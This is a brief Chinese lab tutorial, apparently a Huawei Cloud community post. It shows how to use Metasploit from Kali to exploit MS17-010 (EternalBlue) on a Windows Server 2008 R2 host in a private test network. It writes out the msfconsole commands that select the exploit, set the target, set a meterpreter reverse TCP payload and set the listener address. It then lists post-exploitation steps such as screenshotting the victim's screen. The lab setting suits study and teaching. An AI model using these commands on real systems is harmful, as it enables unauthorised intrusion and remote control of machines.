Metasploit使用
【摘要】 Metasploit实验环境Win2008R2 IP:192.168.10.130Kali IP:192.168.10.128实验步骤启用Metasploit启动postgresql服务搜索ms17_010找到辅助模块渗透扫描windows的samba服务 msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/m...
实验环境
Win2008R2 IP:192.168.10.130
Kali IP:192.168.10.128
实验步骤
启用Metasploit
启动postgresql服务
搜索ms17_010找到辅助模块
渗透扫描windows的samba服务
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
设置被渗透IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.10.130
rhosts => 192.168.10.130(Win2008R2 IP)
设置payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
设置本机的IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128
lhost => 192.168.10.128 (Kali的IP地址)
查看获取的权限
截图被渗透主机的屏幕
在文件夹中找到此图片打开
【版权声明】本文为华为云社区用户原创内容,未经允许不得转载,如需转载请自行联系原作者进行授权。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)